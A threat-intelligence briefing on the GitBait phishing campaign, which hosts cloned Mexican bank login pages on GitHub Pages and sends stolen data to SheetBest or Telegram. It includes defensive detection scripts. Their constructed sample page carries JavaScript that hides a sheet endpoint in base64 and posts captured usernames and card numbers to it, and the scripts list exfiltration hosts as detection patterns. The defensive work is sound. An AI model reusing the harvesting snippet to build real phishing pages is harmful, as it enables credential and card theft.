Hackers abuse GitHub to phish customers of a dozen Mexican banks

Researchers at Group-IB have exposed a long-running phishing operation that turned GitHub's trusted infrastructure into a weapon against banking customers in Mexico, harvesting logins, card numbers, and customer IDs from people who believed they were on their bank's real website.

The campaign, which Group-IB calls GitBait, has been active for roughly three years and impersonates at least 12 financial institutions operating in Mexico. The operators built it on a fully serverless design: the phishing pages are hosted free on GitHub Pages, and stolen credentials are siphoned off through a legitimate cloud service rather than any server the attackers have to run themselves.

Why it matters

Because the pages live on github.io addresses, they inherit GitHub's reputation and automatic HTTPS, so they look trustworthy to victims and slip past simple domain blocklists: blocking github.io outright would break legitimate traffic, and each new repository gets a fresh subdomain for free. Group-IB counted more than 100 associated github.io domains, each hosting multiple phishing pages, and found commit histories showing several operator accounts maintaining the kit continuously for over a year. It is part of a wider shift in which criminals lean on everyday cloud platforms instead of custom malware, much like other phishing-as-a-service operations that turn free tooling into mass fraud.

How the attack works

The operation runs from a modular phishing kit with an internal selector panel that lets the attackers spin up a page for whichever bank they want to target. Victims are likely lured in by SMS, messaging apps, or email, then walked through a cloned login flow that mimics the real bank, including a fake verification screen shown after they hand over their details to keep suspicion low.

Stolen data is intercepted by obfuscated JavaScript and sent in real time to the SheetBest API, a service that writes directly into Google Sheets, so the criminals collect everything in a spreadsheet without operating a back-end server. One variant instead shipped the data to a Telegram bot. To make malicious links look legitimate when shared in chat apps, the pages even carry crafted Open Graph preview tags, so a victim sees a trusted bank's name and logo in the link preview before tapping. The same instinct to abuse trusted developer platforms has surfaced in recent software supply-chain attacks.
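The page-level traits described above (a github.io host, Open Graph tags that claim a bank, and script that posts form data to a third-party sheet or bot API, with the endpoint possibly hidden in a base64 string) can be checked mechanically on a fetched page. The script below is an example added to this briefing, not Group-IB's tooling; the brand name BancoEjemplo, its legitimate domain, and both sample pages are constructed for the demonstration, and the sheet ID is a placeholder.

```python
"""Triage a fetched page for the GitBait pattern: a github.io host, Open Graph
tags that claim a bank brand, and script that posts form data to a third-party
sheet or bot API, possibly behind a base64 string.
Example code added to this briefing, not Group-IB's tooling."""
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical brand and its legitimate domains; a defender fills these in.
LEGIT_DOMAINS = {"bancoejemplo": ("bancoejemplo.com.mx",)}
# Exfiltration services named in the briefing (armed here only for string matching).
EXFIL_HOSTS = ("api.sheetbest.com", "api.telegram.org")
FREE_HOST_SUFFIXES = (".github.io",)


class PageScanner(HTMLParser):
    """Collect Open Graph meta tags, form actions and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.og = {}
        self.form_actions = []
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta" and (a.get("property") or "").startswith("og:"):
            self.og[a["property"]] = a.get("content") or ""
        elif tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def decode_atob_literals(script):
    """Return the decoded text of every atob("...") literal so hidden endpoints become visible."""
    out = []
    for _, b64 in re.findall(r"""atob\((['"])([A-Za-z0-9+/=]+)\1\)""", script):
        try:
            out.append(base64.b64decode(b64).decode("utf-8", "ignore"))
        except ValueError:
            continue
    return out


def on_domain(host, domains):
    """True if host is one of the domains or a subdomain of one (no substring matches)."""
    return any(host == d or host.endswith("." + d) for d in domains)


def triage(url, html):
    """Return a list of findings for one page; an empty list means nothing matched."""
    host = (urlparse(url).hostname or "").lower()
    scanner = PageScanner()
    scanner.feed(html)
    findings = []
    if host.endswith(FREE_HOST_SUFFIXES):
        findings.append(f"hosted on free pages host {host}")
    og_text = " ".join(scanner.og.values()).lower()
    for brand, domains in LEGIT_DOMAINS.items():
        if brand in og_text and not on_domain(host, domains):
            findings.append(f"Open Graph tags claim {brand} but {host} is not a known brand domain")
    # Look at raw script and form targets plus anything unpacked from atob() literals.
    blob = " ".join(scanner.scripts + scanner.form_actions)
    blob += " " + " ".join(d for s in scanner.scripts for d in decode_atob_literals(s))
    for ex in EXFIL_HOSTS:
        if ex in blob:
            findings.append(f"page submits data to {ex}")
    return findings


# Constructed sample pages for the demo (not real captures); the sheet ID is a placeholder.
_HIDDEN = base64.b64encode(
    b"https://api.sheetbest.com/sheets/00000000-0000-0000-0000-000000000000").decode()
PHISH_URL = "https://bancoejemplo-soporte.github.io/cancelacion/"
PHISH_HTML = f"""<html><head>
<meta property="og:title" content="BancoEjemplo - Banca en linea">
<meta property="og:site_name" content="BancoEjemplo">
</head><body>
<form id="f"><input name="usuario"><input name="tarjeta"></form>
<script>
var u = atob("{_HIDDEN}");
document.getElementById("f").onsubmit = function (e) {{
  e.preventDefault();
  fetch(u, {{method: "POST", body: JSON.stringify(Object.fromEntries(new FormData(this)))}});
}};
</script></body></html>"""
LEGIT_URL = "https://www.bancoejemplo.com.mx/login"
LEGIT_HTML = """<html><head><meta property="og:site_name" content="BancoEjemplo"></head>
<body><form action="/login" method="post"><input name="usuario"></form></body></html>"""

if __name__ == "__main__":
    for u, h in ((PHISH_URL, PHISH_HTML), (LEGIT_URL, LEGIT_HTML)):
        print(u, "->", triage(u, h) or ["no findings"])
```

Run stand-alone it prints three findings for the constructed github.io page and none for the bank-domain page. The atob() unpacking is there because a single base64 layer is enough to defeat a plain string match for api.sheetbest.com; a real kit may use other encodings, so treat the decoder as one layer of several rather than a complete deobfuscator.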

What you should do

Group-IB urges banks to monitor GitHub for repositories impersonating their brand (watch for naming patterns like brand-soporte or brand-cancelacion) and to report them for takedown. Security teams should flag unexpected outbound POST requests to api.sheetbest[.]com from user web sessions, lean on behavioral detection rather than domain blocklists alone, and remind customers that a bank will never ask for card details or passwords through a link delivered by text or chat. The findings come from Group-IB's original research.
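Two of the hunts above, flagging outbound POSTs to the named exfiltration services from user web sessions and screening repository names for the brand-soporte / brand-cancelacion pattern, are shown together below. This is example code added to this briefing, not Group-IB's; the simplified proxy log layout, the BancoEjemplo brand, the repository names and the sample log lines are all constructed, and the sheet IDs and bot token are placeholders.

```python
"""Hunts from the 'What you should do' section: alert on POSTs to the exfiltration
services named in the briefing, scoring higher when the Referer is a github.io
page, and screen repository names for the brand-soporte / brand-cancelacion
naming pattern. Example code added to this briefing; the log format, brand
name and sample data are assumptions, not Group-IB's."""
import re
from urllib.parse import urlparse

EXFIL_HOSTS = {"api.sheetbest.com", "api.telegram.org"}
LURE_WORDS = ("soporte", "cancelacion", "mb1")

# Constructed proxy log in a simplified "timestamp client method url referer" layout
# ("-" = no Referer). Sheet IDs and the bot token are placeholders.
SAMPLE_LOG = """\
2024-05-02T10:01:07Z 10.20.0.15 GET https://bancoejemplo-soporte.github.io/cancelacion/ -
2024-05-02T10:01:09Z 10.20.0.15 GET https://bancoejemplo-soporte.github.io/cancelacion/app.js https://bancoejemplo-soporte.github.io/cancelacion/
2024-05-02T10:01:44Z 10.20.0.15 POST https://api.sheetbest.com/sheets/00000000-0000-0000-0000-000000000000 https://bancoejemplo-soporte.github.io/cancelacion/
2024-05-02T10:02:10Z 10.20.0.31 GET https://www.bancoejemplo.com.mx/login -
2024-05-02T10:03:55Z 10.20.0.44 POST https://api.telegram.org/bot000:PLACEHOLDER/sendMessage -
2024-05-02T10:04:12Z 10.20.0.50 GET https://api.sheetbest.com/sheets/11111111-1111-1111-1111-111111111111 https://intranet.example.org/dashboard
"""

# Constructed repository names as a GitHub search might return them.
SAMPLE_REPOS = ["bancoejemplo-soporte", "BancoEjemplo-cancelacion",
                "bancoejemplo-sdk-samples", "otro-proyecto-mb1", "soporte-tecnico"]


def host_of(url):
    return (urlparse(url).hostname or "").lower()


def parse_line(line):
    """Split one log line into fields; None for lines that do not fit the layout."""
    parts = line.split()
    if len(parts) != 5:
        return None
    ts, client, method, url, referer = parts
    return {"ts": ts, "client": client, "method": method, "url": url,
            "referer": "" if referer == "-" else referer}


def detect_exfil_posts(log_text):
    """Return one alert per POST to an exfiltration service. GETs to SheetBest are
    left alone: the service itself is legitimate, and the briefing's signal is an
    unexpected POST from a user web session."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or rec["method"] != "POST":
            continue
        if host_of(rec["url"]) not in EXFIL_HOSTS:
            continue
        ref_host = host_of(rec["referer"])
        alerts.append({
            "ts": rec["ts"],
            "client": rec["client"],
            "exfil_host": host_of(rec["url"]),
            "referer_host": ref_host,
            # A GitHub Pages referer plus a sheet/bot POST is the full chain described above.
            "severity": "high" if ref_host.endswith(".github.io") else "medium",
        })
    return alerts


def hunt_repo_names(names, brands):
    """Return names that pair a watched brand with a lure word as a separate token."""
    hits = []
    for name in names:
        low = name.lower()
        has_brand = any(b in low for b in brands)
        has_lure = any(re.search(rf"(^|[-_.]){w}([-_.]|$)", low) for w in LURE_WORDS)
        if has_brand and has_lure:
            hits.append(name)
    return hits


if __name__ == "__main__":
    for alert in detect_exfil_posts(SAMPLE_LOG):
        print(alert)
    print(hunt_repo_names(SAMPLE_REPOS, ("bancoejemplo",)))
```

On the constructed log this yields two alerts: a high-severity one for the client that loaded a github.io page and then posted to api.sheetbest.com, and a medium one for a Telegram bot POST with no referer. The dashboard GET to SheetBest is deliberately not flagged, which is the caveat behind the briefing's "unexpected POST" wording: a sheet API in proxy logs is not by itself malicious, so check the referer and the direction of the request before escalating. The repository hunt keys on the naming pattern quoted from Group-IB and would be fed with results from GitHub's search API in practice.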

Indicators of compromise

Exfiltration endpoints included hxxps://api[.]sheetbest[.]com/sheets/f2958fbe-cdd7-4796-a4e4-19539d759a9f and several sibling sheet IDs, all resolving to 159[.]89[.]254[.]93. Phishing paths frequently used directories named /cancelacion, /soporte, and /mb1.

This briefing is provided by IntelFusions for informational and defensive purposes only. It is based on sources assessed to be reliable at the time of writing, and analytic judgments carry the confidence levels indicated. Indicators of compromise are defanged; re-arm them only in controlled environments. IntelFusions is not affiliated with the organizations named and makes no warranty as to completeness or accuracy.
